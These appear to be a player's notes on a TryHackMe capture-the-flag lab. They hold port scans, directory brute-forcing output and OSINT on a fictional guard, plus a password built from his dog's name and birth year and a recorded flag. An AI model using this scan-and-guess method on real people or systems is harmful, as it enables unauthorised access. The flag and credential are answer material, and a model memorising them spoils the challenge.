2025-12-26 12:49:13 EST -- START TIME
# The Great Dsiappearing Act
--------------------------------------

|================================================================
- Name: 
- IP Address: 10.67.132.175
- OS: 
- Notes: 

//CREDS:
	//guard.hopkins@hopsecasylum.com:Johnnyboy1982!

//Flags:
	#Cell/Storage: THM{h0pp1ing_m4d}

|================================================================
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

## Introduction
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
### Hopper the Court Jester 
//Once upon a time, there was a red-teaming mastermind turned court jester… our story begins with Hopper. Once feared as the ruthless Head of the Red Team Bunny Battalion, Hopper rose to the rank of Colonel with dizzying speed. The promotion filled him with such exhilaration and such hunger for more that it consumed his every thought. His soldiers mistook his growing twitch for stress and began calling him “Colonel Panic”, but the truth was far more dangerous: the twitch came from his obsession with power, not fear.

//In those days, Hopper had already played a crucial, though conveniently forgotten, role in the earliest whispers of the Wareville siege. Buried beneath secrecy and denied by the crown, those first experiments in breaching new digital frontiers were Hopper’s design. But when the King began distancing himself from the truth, Hopper’s contributions were quietly erased from history, and his fall from grace accelerated. We now find Hopper in his prison cell in HopSec Asylum.

### Initial Access
//This challenge is unlocked by finding the Side Quest key in Advent of Cyber Day 1. If you have been savvy enough to find it, you can unlock the machine by visiting 10.66.191.210:21337 and entering your key. Happy Side Questing!

Visit: http://10.67.132.175:21337/
Memory Key: now_you_see_me

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


// nmap --
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

// SCAN
ip=10.65.151.65
ports=$(nmap -Pn -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | paste -sd ',' -)

echo $ports
//22,80,8000,8080,9001,13400,13401,13402,13403,13404,21337

2025-12-26 13:16:55 EST -- 
sudo nmap -Pn -A -p$ports $ip -oN tcp.nmap

PORT      STATE    SERVICE         VERSION
22/tcp    open     ssh             OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 f6:57:c8:42:d1:10:46:15:8a:ee:be:34:9f:a0:f5:a0 (ECDSA)
|_  256 fa:ce:cc:22:5f:41:d3:ba:e9:f9:49:77:77:af:47:00 (ED25519)
80/tcp    open     http            nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: HopSec Asylum - Security Console
8000/tcp  filtered http-alt
8080/tcp  open     http            SimpleHTTPServer 0.6 (Python 3.12.3)
|_http-server-header: SimpleHTTP/0.6 Python/3.12.3
|_http-title: HopSec Asylum - Security Console
9001/tcp  filtered tor-orport
13400/tcp open     hadoop-datanode Apache Hadoop 1.24.0 (Ubuntu)
| hadoop-tasktracker-info: 
|_  Logs: loginBtn
| hadoop-datanode-info: 
|_  Logs: loginBtn
|_http-title: HopSec Asylum \xE2\x80\x93 Facility Video Portal
13401/tcp open     http            Werkzeug httpd 3.1.3 (Python 3.12.3)
|_http-server-header: Werkzeug/3.1.3 Python/3.12.3
|_http-title: 404 Not Found
13402/tcp open     http            nginx 1.24.0 (Ubuntu)
|_http-cors: HEAD GET OPTIONS
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.24.0 (Ubuntu)
13403/tcp open     unknown
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, RPCCheck, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Date: Fri, 26 Dec 2025 18:17:19 GMT
|     Connection: close
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.1 404 Not Found
|     Date: Fri, 26 Dec 2025 18:17:18 GMT
|_    Connection: close
13404/tcp open     unknown
| fingerprint-strings: 
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SIPOptions, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|_    unauthorized
21337/tcp open     http            Werkzeug httpd 3.0.1 (Python 3.12.3)
|_http-server-header: Werkzeug/3.0.1 Python/3.12.3
|_http-title: Unlock Hopper's Memories

2025-12-26 13:19:54 EST -- 
# UDP scan
sudo nmap -Pn -sU --top-ports 100 $ip -oN udp.nmap

PORT   STATE         SERVICE
68/udp open|filtered dhcpc

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

-- Add /etc/hosts file entries --
echo -e "$ip \t sq2.thm" | sudo tee -a /etc/hosts
cat /etc/hosts

10.67.132.175    sq2.thm


//8000/tcp  filtered http-alt
//FakeBook 
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

#Information I found looking around

//Emails:
guard.hopkins@hopsecasylum.com

//Users:
Guard Hopkins
King Malhare
Sir Carrotbane
Sir BreachBlocker III


//Guard Hopkins Info
- Has a dog named Johnnyboy
- Possible password: Pizza1234$
- Comment: Can I just say.....I LOVE PIZZA
- Comment: Happy 43rd anniversary to the year I was born. Yep 1982! What a year for the world.

//Sir Carrotbane
Trying my hand at some bruteforcing challenges on thm, good to see they have /opt/hashcat-utils/src/combinator.bin on the AttackBox! Always comes in handy 

//Weird Program
- Doordasher

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


// 8080/tcp	http	SimpleHTTPServer 0.6 (Python 3.12.3)
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

-- feroxbuster --
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

2025-12-27 14:03:55 EST -- 
feroxbuster -u http://sq2.thm:8080 -w /usr/share/dirb/wordlists/big.txt --scan-limit 2 -x php,txt,html,htm,aspx -o feroxbuster_8080.out

200  http://sq2.thm:8080/key.svg
200  http://sq2.thm:8080/cgi-bin/session_check.sh
200  http://sq2.thm:8080/cgi-bin/key_flag.sh
200  http://sq2.thm:8080/cgi-bin/escape_check.sh
200  http://sq2.thm:8080/door.svg
200  http://sq2.thm:8080/camera.svg
200  http://sq2.thm:8080/cgi-bin/login.sh
200  http://sq2.thm:8080/cgi-bin/exit_check.sh
200  http://sq2.thm:8080/cgi-bin/psych_check.sh
200  http://sq2.thm:8080/
301  http://sq2.thm:8080/cgi-bin => http://sq2.thm:8080/cgi-bin/
200  http://sq2.thm:8080/index.html
200  http://sq2.thm:8080/success.html

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

//DELETE if not used
// 13400/tcp	hadoop-datanode Apache Hadoop 1.24.0 (Ubuntu) 
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

-- feroxbuster --
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

feroxbuster -u http://$ip:13400 -w /usr/share/wordlists/dirb/common.txt -x js,php,sh -o feroxbuster_13400.out

200  http://10.67.132.175:13400/favicon.ico
200  http://10.67.132.175:13400/cgi-bin/attach_mod.js
200  http://10.67.132.175:13400/cgi-bin/aspdnsfencrypt.js
200  http://10.67.132.175:13400/cgi-bin/components.sh
200  http://10.67.132.175:13400/cgi-bin/cpstyles.js
200  http://10.67.132.175:13400/cgi-bin/counts.sh
200  http://10.67.132.175:13400/jbossws
200  http://10.67.132.175:13400/JMXSoapAdapter.sh
200  http://10.67.132.175:13400/jquery.php
200  http://10.67.132.175:13400/jpa.php
200  http://10.67.132.175:13400/cgi-bin/CVS/Repository
200  http://10.67.132.175:13400/jrun.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/20.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/1994.js
200  http://10.67.132.175:13400/cgi-bin/dav.sh
200  http://10.67.132.175:13400/languages.php
200  http://10.67.132.175:13400/cgi-bin/development
200  http://10.67.132.175:13400/hls.min.js
200  http://10.67.132.175:13400/javascript
200  http://10.67.132.175:13400/cgi-bin/design.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/acp.sh
200  http://10.67.132.175:13400/linktous.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/admin.cgi
200  http://10.67.132.175:13400/main.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/adserver.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/amanda.js
200  http://10.67.132.175:13400/cgi-bin/edit_link.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/adv.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/appliation
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/apps
200  http://10.67.132.175:13400/merchant2.php
200  http://10.67.132.175:13400/military
200  http://10.67.132.175:13400/mobi.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/axis2-admin
200  http://10.67.132.175:13400/modem.php
200  http://10.67.132.175:13400/cgi-bin/faq.js
200  http://10.67.132.175:13400/mytag_js.js
200  http://10.67.132.175:13400/cgi-bin/fetch.sh
200  http://10.67.132.175:13400/news_insert
200  http://10.67.132.175:13400/military.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/blog_report.php
200  http://10.67.132.175:13400/cgi-bin/folders.php
200  http://10.67.132.175:13400/newssys.php
200  http://10.67.132.175:13400/ne.sh
200  http://10.67.132.175:13400/noindex
200  http://10.67.132.175:13400/nokia
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/blog_ajax.js
200  http://10.67.132.175:13400/cgi-bin/frm_attach.sh
200  http://10.67.132.175:13400/on
200  http://10.67.132.175:13400/cgi-bin/geoip.sh
200  http://10.67.132.175:13400/cgi-bin/forum_old.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cc.php
200  http://10.67.132.175:13400/cgi-bin/generic.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cat.sh
200  http://10.67.132.175:13400/pass
200  http://10.67.132.175:13400/cgi-bin/guest-tracking.php
200  http://10.67.132.175:13400/patents.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cl
200  http://10.67.132.175:13400/cgi-bin/hello.js
200  http://10.67.132.175:13400/cgi-bin/help_answer.php
200  http://10.67.132.175:13400/cgi-bin/honda
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cf.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/chris.sh
200  http://10.67.132.175:13400/cgi-bin/http
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cocoon.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/.cvs.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/coke.sh
200  http://10.67.132.175:13400/cgi-bin/icon.js
200  http://10.67.132.175:13400/cgi-bin/ig
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/comics.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/_vti_log.php
200  http://10.67.132.175:13400/poc
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/_www.js
200  http://10.67.132.175:13400/player.sh
200  http://10.67.132.175:13400/cgi-bin/index.php.php
200  http://10.67.132.175:13400/portlets.php
200  http://10.67.132.175:13400/port.sh
200  http://10.67.132.175:13400/portfolio.php
200  http://10.67.132.175:13400/postcards.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/controller
200  http://10.67.132.175:13400/premium.js
200  http://10.67.132.175:13400/cgi-bin/import.sh
200  http://10.67.132.175:13400/cgi-bin/inlinemod.js
200  http://10.67.132.175:13400/press.js
200  http://10.67.132.175:13400/preferences.sh
200  http://10.67.132.175:13400/cgi-bin/inquire.php
200  http://10.67.132.175:13400/printenv
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/2002.js
200  http://10.67.132.175:13400/printer
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/crack
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/2008.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cpp.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/credit.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cpw.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/crs
200  http://10.67.132.175:13400/cgi-bin/ips_kernel.php
200  http://10.67.132.175:13400/cgi-bin/is-bin.sh
200  http://10.67.132.175:13400/cgi-bin/ja.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/d
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/D
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/custom-log.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/date.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/db_connect
200  http://10.67.132.175:13400/cgi-bin/jsp2
200  http://10.67.132.175:13400/ps.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/dcforum
200  http://10.67.132.175:13400/purchase.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/admin_index.js
200  http://10.67.132.175:13400/qsc
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/adminpanel.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/admin1.sh
200  http://10.67.132.175:13400/cgi-bin/JMXSoapAdapter.sh
200  http://10.67.132.175:13400/property.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/de_DE.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/delete
200  http://10.67.132.175:13400/ratecomment
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/addfav.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/admissions.php
200  http://10.67.132.175:13400/cgi-bin/L.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/default_pages.sh
200  http://10.67.132.175:13400/cgi-bin/lat_driver.php
200  http://10.67.132.175:13400/Privacy.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/declarations.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/devices.php
200  http://10.67.132.175:13400/produkte.sh
200  http://10.67.132.175:13400/cgi-bin/license_afl
200  http://10.67.132.175:13400/recorded.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/and.js
200  http://10.67.132.175:13400/referrers.php
200  http://10.67.132.175:13400/cgi-bin/listusers
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/antibot_image.php
200  http://10.67.132.175:13400/related.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/dh_phpmyadmin.js
200  http://10.67.132.175:13400/regional.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/append.js
200  http://10.67.132.175:13400/reference.php
200  http://10.67.132.175:13400/replicator.php
200  http://10.67.132.175:13400/region.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/archive
200  http://10.67.132.175:13400/cgi-bin/logon
200  http://10.67.132.175:13400/req.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/artikel
200  http://10.67.132.175:13400/res.php
200  http://10.67.132.175:13400/resin.js
200  http://10.67.132.175:13400/cgi-bin/ls.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/asp.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/edit_profile
200  http://10.67.132.175:13400/cgi-bin/macromedia.php
200  http://10.67.132.175:13400/restored.sh
200  http://10.67.132.175:13400/cgi-bin/Main_Page.js
200  http://10.67.132.175:13400/cgi-bin/magazines.sh
200  http://10.67.132.175:13400/cgi-bin/mana
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/email-a-friend.js
200  http://10.67.132.175:13400/cgi-bin/mail.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/axis2
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/authorization.sh
200  http://10.67.132.175:13400/rssarticle
200  http://10.67.132.175:13400/cgi-bin/managed.js
200  http://10.67.132.175:13400/cgi-bin/math
200  http://10.67.132.175:13400/cgi-bin/mcp
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/embedded.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/erraddsave
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/Entertainment.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/banner_element.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/esp
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/basketball
200  http://10.67.132.175:13400/cgi-bin/Menus
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/bb-hist
200  http://10.67.132.175:13400/cgi-bin/membre.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/bakup.sh
200  http://10.67.132.175:13400/scriptlets.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/bk
200  http://10.67.132.175:13400/secureprocess.js
200  http://10.67.132.175:13400/sections.sh
200  http://10.67.132.175:13400/cgi-bin/mix
200  http://10.67.132.175:13400/selected.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/ext2.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/extern.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/fcgi-bin
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/family.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/fckeditor
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/feed
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/box
200  http://10.67.132.175:13400/sensepost.js
200  http://10.67.132.175:13400/cgi-bin/mount.php
200  http://10.67.132.175:13400/sessionlist.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/filelist
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/brochures.js
200  http://10.67.132.175:13400/share
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/BUILD
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/firewalls
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/firmconnect
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/buildr.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/cache
200  http://10.67.132.175:13400/shtml.sh
200  http://10.67.132.175:13400/sitecore.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/forgotpassword.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/folder_new.js
200  http://10.67.132.175:13400/signin.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/func.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/certificates.sh
200  http://10.67.132.175:13400/soft.js
200  http://10.67.132.175:13400/cgi-bin/omited
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/front.php
200  http://10.67.132.175:13400/sold.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/cfg.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/fusion
200  http://10.67.132.175:13400/spamlog.log
200  http://10.67.132.175:13400/soporte.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/furl.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/cgi-script.sh
200  http://10.67.132.175:13400/cgi-bin/opinions.sh
200  http://10.67.132.175:13400/cgi-bin/oracle.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/change_password.js
200  http://10.67.132.175:13400/ss_vms_admin_sm
200  http://10.67.132.175:13400/sponsors.php
200  http://10.67.132.175:13400/cgi-bin/outgoing.js
200  http://10.67.132.175:13400/srchad.sh
200  http://10.67.132.175:13400/staff_directory.php
200  http://10.67.132.175:13400/stale.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/g.js
200  http://10.67.132.175:13400/cgi-bin/pagination.sh
200  http://10.67.132.175:13400/cgi-bin/passport.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/gracias.php
200  http://10.67.132.175:13400/cgi-bin/party.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/groupware.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/cl.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/guest-tracking.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/gsm.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/complaints
200  http://10.67.132.175:13400/cgi-bin/passes.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/guests.php
200  http://10.67.132.175:13400/subscriber.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/compare_product.php
200  http://10.67.132.175:13400/cgi-bin/payments.sh
200  http://10.67.132.175:13400/stored.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/config.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/help.php
200  http://10.67.132.175:13400/cgi-bin/pgsql.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/contacts
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/holiday
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/high.sh
200  http://10.67.132.175:13400/soft.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/honda
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/conf.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/cpath
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/creation
200  http://10.67.132.175:13400/temporary
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/hp.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/create.js
200  http://10.67.132.175:13400/cgi-bin/pma
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/ibm.sh
200  http://10.67.132.175:13400/cgi-bin/pmwiki.sh
200  http://10.67.132.175:13400/test1234
200  http://10.67.132.175:13400/cgi-bin/portfolio
200  http://10.67.132.175:13400/cgi-bin/post
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/customer_login.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/HTML.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/CVS
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/inbox
200  http://10.67.132.175:13400/thumbs.db
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/include.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/cxf.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/CYBERDOCS.sh
200  http://10.67.132.175:13400/test123.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/info
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/index_adm.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/dating
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/database.js
200  http://10.67.132.175:13400/tncms.php
200  http://10.67.132.175:13400/cgi-bin/pp.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/index.php.js
200  http://10.67.132.175:13400/tmps.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/inetpub.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/dana-na.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/daten.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/d.sh
200  http://10.67.132.175:13400/cgi-bin/printers.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/dcforum.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/creation.js
200  http://10.67.132.175:13400/cgi-bin/printthread.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/declaration.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/databases.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/intracorp
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/int.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/default_logo.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/index_2.php
200  http://10.67.132.175:13400/cgi-bin/product_compare.php
200  http://10.67.132.175:13400/cgi-bin/prog.sh
200  http://10.67.132.175:13400/tt.php
200  http://10.67.132.175:13400/cgi-bin/prodimages.sh
200  http://10.67.132.175:13400/umbraco.js
200  http://10.67.132.175:13400/user_upload.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/joe.sh
200  http://10.67.132.175:13400/US.php
200  http://10.67.132.175:13400/cgi-bin/put.js
200  http://10.67.132.175:13400/usernote.js
200  http://10.67.132.175:13400/cgi-bin/pt_BR.sh
200  http://10.67.132.175:13400/cgi-bin/radio
200  http://10.67.132.175:13400/v.js
200  http://10.67.132.175:13400/cgi-bin/rarticles.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/dragon.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/keep.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/Download.php
200  http://10.67.132.175:13400/utility_login.php
200  http://10.67.132.175:13400/cgi-bin/publish.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/drop.js
200  http://10.67.132.175:13400/vector.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/downloads.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/dump.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/lat_signin
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/ds.js
200  http://10.67.132.175:13400/cgi-bin/rating.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/learners.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/kill.js
200  http://10.67.132.175:13400/user.sh
200  http://10.67.132.175:13400/cgi-bin/quote.sh
200  http://10.67.132.175:13400/voter
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/easy.php
200  http://10.67.132.175:13400/viewtopic.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/embedd.php
200  http://10.67.132.175:13400/cgi-bin/records.sh
200  http://10.67.132.175:13400/cgi-bin/rep.php
200  http://10.67.132.175:13400/web.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/linktous.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/embedded.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/login1
200  http://10.67.132.175:13400/cgi-bin/resolved.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/login-redirect.js
200  http://10.67.132.175:13400/webagent.php
200  http://10.67.132.175:13400/webshop
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/equipment.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/LogFiles.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/erraddsave.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/lunch_menu.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/low.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/es.php
200  http://10.67.132.175:13400/cgi-bin/root.js
200  http://10.67.132.175:13400/wifi.php
200  http://10.67.132.175:13400/cgi-bin/run
200  http://10.67.132.175:13400/will.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/m_images.php
200  http://10.67.132.175:13400/wink.php
200  http://10.67.132.175:13400/cgi-bin/restricted.sh
200  http://10.67.132.175:13400/cgi-bin/roadmap.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/manuals.php
200  http://10.67.132.175:13400/wicket.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/mediaplayer
200  http://10.67.132.175:13400/cgi-bin/sdk.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/F.sh
200  http://10.67.132.175:13400/wwhelp
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/mchat.sh
200  http://10.67.132.175:13400/cgi-bin/secondary.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/fetch.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/media.js
200  http://10.67.132.175:13400/cgi-bin/sendpm.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/fixed.php
200  http://10.67.132.175:13400/z.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/folder_new.php
200  http://10.67.132.175:13400/yahoo.php
200  http://10.67.132.175:13400/cgi-bin/showenv
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/fusion.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/frontpage.sh
200  http://10.67.132.175:13400/cgi-bin/sign.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/notification.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/gp.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/gump
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/glimpse.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/mx.sh
